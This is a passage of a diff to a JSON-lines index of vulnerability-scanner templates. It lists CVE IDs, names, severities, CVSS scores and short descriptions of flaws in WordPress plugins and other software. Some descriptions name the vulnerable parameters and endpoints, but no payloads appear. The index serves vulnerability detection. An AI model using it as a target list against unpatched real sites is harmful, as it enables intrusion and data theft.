data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"} {"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"} {"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"} {"ID":"CVE-2021-24910","Info":{"Name":"WordPress Transposh Translation \u003c1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24910.yaml"} +{"ID":"CVE-2021-24915","Info":{"Name":"Contest Gallery \u003c 13.1.0.6 - SQL injection","Severity":"critical","Description":"The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24915.yaml"} {"ID":"CVE-2021-24917","Info":{"Name":"WordPress WPS Hide Login \u003c1.9.1 - Information Disclosure","Severity":"high","Description":"WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24917.yaml"} {"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"} {"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"} {"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"} {"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"} {"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"} +{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"} {"ID":"CVE-2021-24970","Info":{"Name":"WordPress All-In-One Video Gallery \u003c2.5.0 - Local File Inclusion","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24970.yaml"} +{"ID":"CVE-2021-24979","Info":{"Name":"Paid Memberships Pro \u003c 2.6.6 - Cross-Site Scripting","Severity":"medium","Description":"The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24979.yaml"} {"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24987.yaml"} {"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-24991.yaml"} {"ID":"CVE-2021-24997","Info":{"Name":"WordPress Guppy \u003c=1.1 - Information Disclosure","Severity":"medium","Description":"WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24997.yaml"} {"ID":"CVE-2021-25003","Info":{"Name":"WordPress WPCargo Track \u0026 Trace \u003c6.9.0 - Remote Code Execution","Severity":"critical","Description":"WordPress WPCargo Track \u0026 Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-25003.yaml"} {"ID":"CVE-2021-25008","Info":{"Name":"The Code Snippets WordPress Plugin \u003c 2.14.3 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25008.yaml"} +{"ID":"CVE-2021-25016","Info":{"Name":"Chaty \u003c 2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25016.yaml"} {"ID":"CVE-2021-25028","Info":{"Name":"WordPress Event Tickets \u003c 5.2.2 - Open Redirect","Severity":"medium","Description":"WordPress Event Tickets \u003c 5.2.2 is susceptible to an open redirect vulnerability. The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25028.yaml"} {"ID":"CVE-2021-25033","Info":{"Name":"Noptin \u003c 1.6.5 - Open Redirect","Severity":"medium","Description":"Noptin \u003c 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the \"to\" parameter before redirecting the user to its given value, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25033.yaml"} {"ID":"CVE-2021-25052","Info":{"Name":"WordPress Button Generator \u003c2.3.3 - Remote File Inclusion","Severity":"high","Description":"WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-25052.yaml"} {"ID":"CVE-2021-25055","Info":{"Name":"WordPress FeedWordPress \u003c 2022.0123 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"The plugin is affected by a cross-site scripting vulnerability within the \"visibility\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25055.yaml"} {"ID":"CVE-2021-25063","Info":{"Name":"WordPress Contact Form 7 Skins \u003c=2.5.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25063.yaml"} +{"ID":"CVE-2021-25065","Info":{"Name":"Smash Balloon Social Post Feed \u003c 4.1.1 - Authenticated Reflected Cross-Site Scripting","Severity":"medium","Description":"The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-25065.yaml"} {"ID":"CVE-2021-25067","Info":{"Name":"Landing Page Builder \u003c 1.4.9.6 - Cross-Site Scripting","Severity":"medium","Description":"The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-25067.yaml"} {"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25074.yaml"} {"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2021/CVE-2021-25075.yaml"} -{"ID":"CVE-2021-25078","Info":{"Name":"Affiliates Manager \u003c 2.9.0 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-25078.yaml"} +{"ID":"CVE-2021-25078","Info":{"Name":"Affiliates Manager \u003c 2.9.0 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25078.yaml"} +{"ID":"CVE-2021-25079","Info":{"Name":"Contact Form Entries \u003c 1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25079.yaml"} {"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25085.yaml"} {"ID":"CVE-2021-25099","Info":{"Name":"WordPress GiveWP \u003c2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25099.yaml"} {"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25104.yaml"} @@ -1153,6 +1234,7 @@ {"ID":"CVE-2021-27520","Info":{"Name":"FUDForum 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27520.yaml"} {"ID":"CVE-2021-27561","Info":{"Name":"YeaLink DM 3.6.0.20 - Remote Command Injection","Severity":"critical","Description":"Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27561.yaml"} {"ID":"CVE-2021-27651","Info":{"Name":"Pega Infinity - Authentication Bypass","Severity":"critical","Description":"Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27651.yaml"} +{"ID":"CVE-2021-27670","Info":{"Name":"Appspace 6.2.4 - Server-Side Request Forgery","Severity":"critical","Description":"Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27670.yaml"} {"ID":"CVE-2021-27748","Info":{"Name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","Severity":"high","Description":"IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-27748.yaml"} {"ID":"CVE-2021-27850","Info":{"Name":"Apache Tapestry - Remote Code Execution","Severity":"critical","Description":"Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27850.yaml"} {"ID":"CVE-2021-27905","Info":{"Name":"Apache Solr \u003c=8.8.1 - Server-Side Request Forgery","Severity":"critical","Description":"Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27905.yaml"} @@ -1169,6 +1251,7 @@ {"ID":"CVE-2021-28854","Info":{"Name":"VICIdial Sensitive Information Disclosure","Severity":"high","Description":"VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-28854.yaml"} {"ID":"CVE-2021-28918","Info":{"Name":"Netmask NPM Package - Server-Side Request Forgery","Severity":"critical","Description":"Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-28918.yaml"} {"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"} +{"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"} {"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"} {"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"} {"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"} @@ -1190,7 +1273,7 @@ {"ID":"CVE-2021-30461","Info":{"Name":"VoipMonitor \u003c24.61 - Remote Code Execution","Severity":"critical","Description":"VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-30461.yaml"} {"ID":"CVE-2021-30497","Info":{"Name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","Severity":"high","Description":"Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-30497.yaml"} {"ID":"CVE-2021-3110","Info":{"Name":"PrestaShop 1.7.7.0 - SQL Injection","Severity":"critical","Description":"PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-3110.yaml"} -{"ID":"CVE-2021-31195","Info":{"Name":"Microsoft Exchange Server - Cross-Site Scripting","Severity":"high","Description":"Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-31195.yaml"} +{"ID":"CVE-2021-31195","Info":{"Name":"Microsoft Exchange Server - Cross-Site Scripting","Severity":"medium","Description":"Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-31195.yaml"} {"ID":"CVE-2021-31249","Info":{"Name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","Severity":"medium","Description":"CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-31249.yaml"} {"ID":"CVE-2021-31250","Info":{"Name":"CHIYU TCP/IP Converter - Cross-Site Scripting","Severity":"medium","Description":"CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-31250.yaml"} {"ID":"CVE-2021-3129","Info":{"Name":"Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution","Severity":"critical","Description":"Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-3129.yaml"} @@ -1234,7 +1317,8 @@ {"ID":"CVE-2021-34643","Info":{"Name":"WordPress Skaut Bazar \u003c1.3.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-34643.yaml"} {"ID":"CVE-2021-34805","Info":{"Name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","Severity":"high","Description":"FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-34805.yaml"} {"ID":"CVE-2021-35250","Info":{"Name":"SolarWinds Serv-U 15.3 - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-35250.yaml"} -{"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35265.yaml"} +{"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS \u003e V106 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35265.yaml"} +{"ID":"CVE-2021-35323","Info":{"Name":"Bludit 3.13.1 - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35323.yaml"} {"ID":"CVE-2021-35336","Info":{"Name":"Tieline IP Audio Gateway \u003c=2.6.4.8 - Unauthorized Remote Admin Panel Access","Severity":"critical","Description":"Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35336.yaml"} {"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Local File Inclusion","Severity":"high","Description":"TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-35380.yaml"} {"ID":"CVE-2021-35464","Info":{"Name":"ForgeRock OpenAM \u003c7.0 - Remote Code Execution","Severity":"critical","Description":"ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.\nThe exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n/ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\nfound in versions of Java 8 or earlier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35464.yaml"} @@ -1251,8 +1335,8 @@ {"ID":"CVE-2021-36749","Info":{"Name":"Apache Druid - Local File Inclusion","Severity":"medium","Description":"Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-36749.yaml"} {"ID":"CVE-2021-36873","Info":{"Name":"WordPress iQ Block Country \u003c=1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-36873.yaml"} {"ID":"CVE-2021-37216","Info":{"Name":"QSAN Storage Manager \u003c3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37216.yaml"} -{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} -{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} +{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace 